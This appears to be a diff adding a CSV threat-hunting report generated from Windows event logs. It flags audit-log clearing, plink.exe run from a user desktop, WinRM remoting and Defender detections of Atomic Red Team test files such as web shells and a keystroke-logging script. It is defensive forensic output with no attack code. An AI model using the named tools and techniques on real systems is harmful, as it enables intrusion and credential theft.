+ + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 565591 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + administrator + EXAMPLE + 0x4fd77 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1547969410.645116,2019-01-20T11:30:10.645116+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 32950 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x35312 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1547967656.784849,2019-01-20T11:00:56.784849+04:00,,Audit,Critical,Audit log cleared by user ( Administrator ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 32853 + + + + + Security + WIN-77LTAPHIQ1R.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-500 + Administrator + EXAMPLE + 0x35312 + + +",WIN-77LTAPHIQ1R.example.corp,Security +Audit log cleared,1600193079.987052,2020-09-15T22:04:39.987052+04:00,,Audit,Critical,Audit log cleared by user ( IEUser ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 161471 + + + + + Security + MSEDGEWIN10 + + + + + + S-1-5-21-3461203602-4096304019-2269080069-1000 + IEUser + MSEDGEWIN10 + 0x52a7d + + +",MSEDGEWIN10,Security +Audit log cleared,1552908425.42562,2019-03-18T15:27:05.425620+04:00,,Audit,Critical,Audit log cleared by user ( user01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 433307 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x18a7875 + + +",PC01.example.corp,Security +Suspicious Command or process found in the log,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,Critical,Found a log contain suspicious command or process ( plink.exe),4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +",PC01.example.corp,Security +Process running in Unusual location,1550081008.338519,2019-02-13T22:03:28.338519+04:00,,Threat,High,"User Name : ( user01 ) with process : ( C:\Users\user01\Desktop\plink.exe ) run from Unusual location , check the number and date of execution in process execution report",4688," + + + + + 4688 + 1 + 0 + 13312 + 0 + 0x8020000000000000 + + + 227714 + + + + + Security + PC01.example.corp + + + + + S-1-5-21-1587066498-1489273250-1035260531-1106 + user01 + EXAMPLE + 0x2ed80 + 0xcfc + C:\Users\user01\Desktop\plink.exe + %%1936 + 0xe60 + + +",PC01.example.corp,Security +Audit log cleared,1550080907.51234,2019-02-13T22:01:47.512340+04:00,,Audit,Critical,Audit log cleared by user ( admin01 ),1102," + + + + + 1102 + 0 + 4 + 104 + 0 + 0x4020000000000000 + + + 227693 + + + + + Security + PC01.example.corp + + + + + + S-1-5-21-1587066498-1489273250-1035260531-1108 + admin01 + EXAMPLE + 0xaf855 + + +",PC01.example.corp,Security +connection is initiated using WinRM to this machine - Powershell remoting,-11644473600.0,1601-01-01T04:00:00+04:00,,Audit,High,User (S-1-5-21-738609754-2819869699-4189121830-500) Connected to this machine using WinRM - powershell remote - check eventlog viewer,91," + + + + + 91 + 0 + 4 + 9 + 0 + 0x4000000000000004 + + + 508 + + + + + Microsoft-Windows-WinRM/Operational + DC1.insecurebank.local + + + + + 15005 + shellId + 68007400740070003A002F002F0073006300680065006D00610073002E006D006900630072006F0073006F00660074002E0063006F006D002F007700620065006D002F00770073006D0061006E002F0031002F00770069006E0064006F00770073002F007300680065006C006C002F0063006D0064000000 + +",DC1.insecurebank.local,Microsoft-Windows-WinRM/Operational +Windows Defender took action against Malware,1563483223.034598,2019-07-19T00:53:43.034598+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Action ( 6 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 106 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {8791B1FB-0FE7-412E-B084-524CB5A221F3} + 2019-07-18T20:40:13.775Z + + + 2147735426 + Trojan:XML/Exeselrun.gen!A + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 + 5 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl + 1 + %%845 + 1 + %%813 + 2 + %%823 + 0 + 6 + %%811 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 105 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 104 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} + 2019-07-18T20:41:40.357Z + + + 2147726426 + Trojan:Win32/Sehyioa.A!cl + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 103 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} + 2019-07-18T20:40:18.385Z + + + 2147683177 + Backdoor:ASP/Ace.T + 5 + Severe + 6 + Backdoor + https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 + 3 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 102 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0068) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 101 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 103 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117," + + + + + 1117 + 0 + 4 + 0 + 0 + 0x8000000000000000 + + + 101 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 103 + + 2 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 2 + %%809 + + 0x80508023 + The program could not find the malware and other potentially unwanted software on this device. + + 0 + 0 + No additional actions required + NT AUTHORITY\SYSTEM + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 95 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {F6272F78-9FD1-47D2-B206-89E0F0DCBDB9} + 2019-07-18T20:41:40.357Z + + + 2147726426 + Trojan:Win32/Sehyioa.A!cl + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:Win32/Sehyioa.A!cl&threatid=2147726426&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0 + AM: 1.1.16100.4, NIS: 0.0.0.0 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 76 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED} + 2019-07-18T20:40:18.385Z + + + 2147683177 + Backdoor:ASP/Ace.T + 5 + Severe + 6 + Backdoor + https://go.microsoft.com/fwlink/?linkid=37020&name=Backdoor:ASP/Ace.T&threatid=2147683177&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482477.508276,2019-07-19T00:41:17.508276+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 75 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {37522D93-EBDD-4A5B-93B6-E984C9E3FD38} + 2019-07-18T20:40:16.697Z + + + 2147708292 + HackTool:JS/Jsprat + 4 + High + 34 + Tool + https://go.microsoft.com/fwlink/?linkid=37020&name=HackTool:JS/Jsprat&threatid=2147708292&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp->(SCRIPT0005) + 1 + %%845 + 1 + %%813 + 8 + %%862 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482475.439635,2019-07-19T00:41:15.439635+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:XML/Exeselrun.gen!A ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 48 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {8791B1FB-0FE7-412E-B084-524CB5A221F3} + 2019-07-18T20:40:13.775Z + + + 2147735426 + Trojan:XML/Exeselrun.gen!A + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:XML/Exeselrun.gen!A&threatid=2147735426&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1086\payloads\test.xsl + 1 + %%845 + 1 + %%813 + 2 + %%823 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Suspicious Command or process found in the log,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 37 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational +Windows Defender Found Malware,1563482402.281388,2019-07-19T00:40:02.281388+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116," + + + + + 1116 + 0 + 3 + 0 + 0 + 0x8000000000000000 + + + 37 + + + + + Microsoft-Windows-Windows Defender/Operational + MSEDGEWIN10 + + + + + %%827 + 4.18.1906.3 + {511224D4-1EB4-47B9-BC4A-37E21F923FED} + 2019-07-18T20:40:00.580Z + + + 2147725349 + Trojan:PowerShell/Powersploit.M + 5 + Severe + 8 + Trojan + https://go.microsoft.com/fwlink/?linkid=37020&name=Trojan:PowerShell/Powersploit.M&threatid=2147725349&enterprise=0 + 1 + + 1 + 3 + %%818 + C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe + MSEDGEWIN10\IEUser + + file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 + 1 + %%845 + 1 + %%813 + 0 + %%822 + 0 + 9 + %%887 + + 0x00000000 + The operation completed successfully. + + 0 + 0 + No additional actions required + + + AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 1.297.1333.0 + AM: 1.1.16100.4, NIS: 1.1.16100.4 + +",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational diff --git a/source/screenshot/APTHunter-Allreport.png b/source/screenshot/APTHunter-Allreport.png new file mode 100644 index 0000000..225ecf5 Binary files /dev/null and b/source/screenshot/APTHunter-Allreport.png differ diff --git a/source/screenshot/APTHunter-Excel.png b/source/screenshot/APTHunter-Excel.png new file mode 100644 index 0000000..4db713f Binary files /dev/null and b/source/screenshot/APTHunter-Excel.png differ diff --git a/source/screenshot/APTHunter-Help.png b/source/screenshot/APTHunter-Help.png new file mode 100644 index 0000000..c5a495b Binary files /dev/null and b/source/screenshot/APTHunter-Help.png differ diff --git a/source/screenshot/APTHunter-Timeline-Explorer.png b/source/screenshot/APTHunter-Timeline-Explorer.png new file mode 100644 index 0000000..85b7d8f Binary files /dev/null and b/source/screenshot/APTHunter-Timeline-Explorer.png differ diff --git a/source/screenshot/APTHunter-output.png b/source/screenshot/APTHunter-output.png new file mode 100644 index 0000000..2ce4dd0 Binary files /dev/null and b/source/screenshot/APTHunter-output.png differ